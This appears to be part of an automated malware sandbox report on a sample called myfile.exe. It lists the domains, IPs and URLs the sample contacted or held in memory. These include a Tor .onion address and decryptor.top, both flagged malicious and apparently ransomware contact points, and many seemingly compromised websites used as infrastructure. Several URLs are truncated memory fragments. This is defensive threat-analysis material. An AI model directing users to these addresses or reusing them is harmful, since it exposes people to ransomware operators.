holocine.de	109.237.132.56	true	true	5%, Virustotal, Browse	unknown
oscommunity.de	80.158.2.41	true	true	2%, Virustotal, Browse	unknown
georgemuncey.com	52.215.137.200	true	true	1%, Virustotal, Browse	unknown
nbva.co.uk	85.92.72.56	true	true	4%, Virustotal, Browse	unknown
skoczynski.eu	46.242.240.159	true	true	3%, Virustotal, Browse	unknown
rsidesigns.com	185.58.213.84	true	true	2%, Virustotal, Browse	unknown
business-basic.de	188.40.30.106	true	true	1%, Virustotal, Browse	unknown
altitudeboise.com	188.114.97.3	true	true	4%, Virustotal, Browse	unknown
mieleshopping.it	35.214.166.193	true	true	1%, Virustotal, Browse	unknown
lashandbrowenvy.com	160.153.0.131	true	true	1%, Virustotal, Browse	unknown
m2graph.fr	89.116.147.189	true	true	2%, Virustotal, Browse	unknown
altitudetrampolinepark.com	172.67.71.217	true	false	0%, Virustotal, Browse	unknown
vitoriaecoturismo.com.br	134.209.129.254	true	true	2%, Virustotal, Browse	unknown
c-sprop.com	23.236.62.147	true	false	1%, Virustotal, Browse	unknown
bundan.com	35.214.211.239	true	true	1%, Virustotal, Browse	unknown
afbudsrejserallinclusive.dk	138.201.61.68	true	true		unknown
almamidwifery.com	198.185.159.145	true	true		unknown
kenmccallum.com	188.114.96.3	true	true		unknown
stage-infirmier.fr	141.95.251.157	true	true		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		unknown
mursall.de	95.130.22.108	true	true		unknown
satoblog.org	unknown	unknown	true		unknown
activeterroristwarningcompany.com	unknown	unknown	true		unknown
chomiksy.net	unknown	unknown	true		unknown
www.almamidwifery.com	unknown	unknown	true		unknown
www.lexced.com	unknown	unknown	true		unknown
amelielecompte.wordpress.com	unknown	unknown	true		unknown
www.hostaletdelsindians.es	unknown	unknown	true		unknown
davedavisphotos.com	unknown	unknown	true		unknown
wribrazil.com	unknown	unknown	true		unknown
funworx.de	unknown	unknown	true		unknown
bd2fly.com	unknown	unknown	true		unknown
www.georgemuncey.com	unknown	unknown	true		unknown
avisioninthedesert.com	unknown	unknown	true		unknown
90nguyentuan.com	unknown	unknown	true		unknown
baikalflot.ru	unknown	unknown	true		unknown
ikadomus.com	unknown	unknown	true		unknown
enactusnhlstenden.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://oscommunity.de/wp-content/pictures/vuvqcuzorejq.png	false	Avira URL Cloud: safe	unknown
https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg	false	Avira URL Cloud: malware	unknown
https://magrinya.net/static/temp/mdjsvnauuvkc.jpg	false	Avira URL Cloud: safe	unknown
https://vitoriaecoturismo.com.br/admin/graphic/tajahxayexuseayc.jpg	false	Avira URL Cloud: safe	unknown
https://princebet88.site/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg	false	Avira URL Cloud: malware	unknown
https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpg	false	Avira URL Cloud: safe	unknown
https://bayshoreelite.com/data/game/mfkyhvlfokmitv.png	false	Avira URL Cloud: safe	unknown
https://rsidesigns.com/wp-content/assets/iybw.jpg	false	Avira URL Cloud: safe	unknown
https://www.almamidwifery.com/content/assets/jlbaveucagau.png	false	Avira URL Cloud: safe	unknown
https://almamidwifery.com/content/assets/jlbaveucagau.png	false	Avira URL Cloud: safe	unknown
https://mieleshopping.it/wp-content/game/doiathwnvkwf.gif	false	Avira URL Cloud: safe	unknown
https://karnesstanleyhvac.com/content/images/gv.png	false	Avira URL Cloud: safe	unknown
https://holocine.de/data/assets/hxdtlt.gif	false	Avira URL Cloud: safe	unknown
https://altitudetrampolinepark.com/	false	Avira URL Cloud: safe	unknown
https://kenmccallum.com/uploads/pictures/gcgicdxmun.gif	false	Avira URL Cloud: safe	unknown
https://parksideseniorliving.net/admin/temp/eghuey.png	false	Avira URL Cloud: safe	unknown
https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gif	false	Avira URL Cloud: safe	unknown
https://stage-infirmier.fr/news/pictures/numjznnuau.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://princebet88.site/assets/images/banner-princebet88.webp	myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa3	myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895325965.0000000004360000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://tailwindcss.com	myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://90nguyentuan.com/	myfile.exe, 00000000.00000003.2354771647.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://holocine.de:443/data/assets/hxdtlt.gifgicdxmun.gifesource0	myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.almamidwifery.com/content/assets/jlbaveucagau.pngLocationETagAuthe-RangeContent-Monteion	myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bundan.com/xmlrpc.php	myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://karnesstanleyhvac.com/w	myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://m2graph.fr/m	myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oscommunity.de:443/wp-content/pictures/vuvqcuzorejq.pngx.gifage	myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parksideseniorliving.net/wp-json/	myfile.exe, 00000000.00000003.2354706141.0000000001090000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://stayblue.basecom.eu	myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/sindresorhus/modern-normalize	myfile.exe, 00000000.00000003.2503575660.0000000005B39000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://m2graph.fr/S	myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://m2graph.fr	myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.lexced.com/9E	myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a.storyblok.com/f/201186/1920x2746/71a2ff4150/truegrit_full_purple.jpg);background-position:	myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parksideseniorliving.net/wp-content/uploads/2019/08/Parkside-Logo.png	myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://s3.amazonaws.com/a.storyblok.com/f/20	myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://karnesstanleyhvac.com/content/images/gv.pngpng	myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bundan.com/wp-json/	myfile.exe, 00000000.00000003.2839682725.000000000103D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://almamidwifery.com/	myfile.exe, 00000000.00000002.2895379820.0000000005B3A000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://a.storyblok.com/f/201186/538x872/eb9c0d6ee6/attraction-main-court.png	myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://90nguyentuan.com/wp-content/pics/rbfaqbvnxelf.jpg	myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=	myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.almamidwifery.com/~	myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://testitjavertailut.net/	myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/favicon.ico	myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://innervisions-id.com/png	myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://amelielecompte.wordpress.com/0	myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061	myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.dr, g165067x37-readme.txt45.0.dr, g165067x37-readme.txt62.0.dr, g165067x37-readme.txt32.0.dr	true	Avira URL Cloud: safe	unknown
https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifage	myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://innervisions-id.com/wp-content/images/kpgkqb.jpgq	myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vitoriaecoturismo.com.br/	myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://innervisions-id.com:443/wp-content/images/kpgkqb.jpg.gife0	myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://innervisions-id.com/wp-content/images/kpgkqb.jpgw	myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://m2graph.fr:443/news/pics/sovuwxryinfm.pngfc/lgul.jpg4692b	myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://princebet88.site/assets/images/logo-princebet88.webp	myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chomiksy.net/png	myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://innervisions-id.com/wp-content/images/kpgkqb.jpgr	myfile.exe, 00000000.00000002.2895379820.0000000005B1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/1526923138735-EF8ZSSLD6TS2M24B	myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a.storyblok.com/f/201186/174x174/6a375a03d8/become-a-member-new.png	myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pansionatblago.ru/t$~	myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://schema.org	myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://amelielecompte.wordpress.com/Q	myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://amelielecompte.wordpress.com/O	myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0	myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://a.storyblok.com/f/201186/428x668/95a47a6a61/updatedmobilehero.jpg	myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/	myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://chomiksy.net:443/wp-content/temp/vudowd.png811-000d3aa4692b	myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9	myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://avisioninthedesert.com/	myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bundan.com/	myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nbva.co.uk/wp-json/	myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://princebet88.site/amp/	myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bayshoreelite.com/feed/	myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parksideseniorliving.net/#/schema/logo/image/	myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yoast.com/wordpress/plugins/seo/	myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chainofhopeeurope.eu/?	myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lexced.com/	myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avisioninthedesert.com/wp-content/graphic/lgul.jpg	myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mursall.de/comments/feed/	myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a.storyblok.com/f/201186/173x191/ff8a0137ac/frame-8707-3.png	myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a.storyblok.com/f/201186/1920x2746/013c53af19/truegrit_full_light.jpg	myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mieleshopping.it:443/wp-content/game/doiathwnvkwf.gifa4692b	myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pansionatblago.ru/	myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://m2graph.fr/F	myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chomiksy.net/	myfile.exe, 00000000.00000003.2589691593.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ikadomus.com/news/tmp/zrxchmwcslab.gif	myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://satoblog.org:443/uploads/image/fixizcyhfz.jpgrces	myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.lexced.com/static/tmp/vd.gifLMEMH	myfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gifHk	myfile.exe, 00000000.00000003.2503677440.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600404554.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chainofhopeeurope.eu/(	myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://afbudsrejserallinclusive.dk:443/uploads/assets/xwncifkynx.gifage	myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://decryptor.top/	myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://activeterroristwarningcompany.com:443/news/pics/dpgo.gifyc.jpgbudsrejserallinclusive.dk/uplo	myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avisioninthedesert.com/~	myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ikadomus.com:443/news/tmp/zrxchmwcslab.gifiathwnvkwf.gife0	myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.lexced.com/?s=	myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
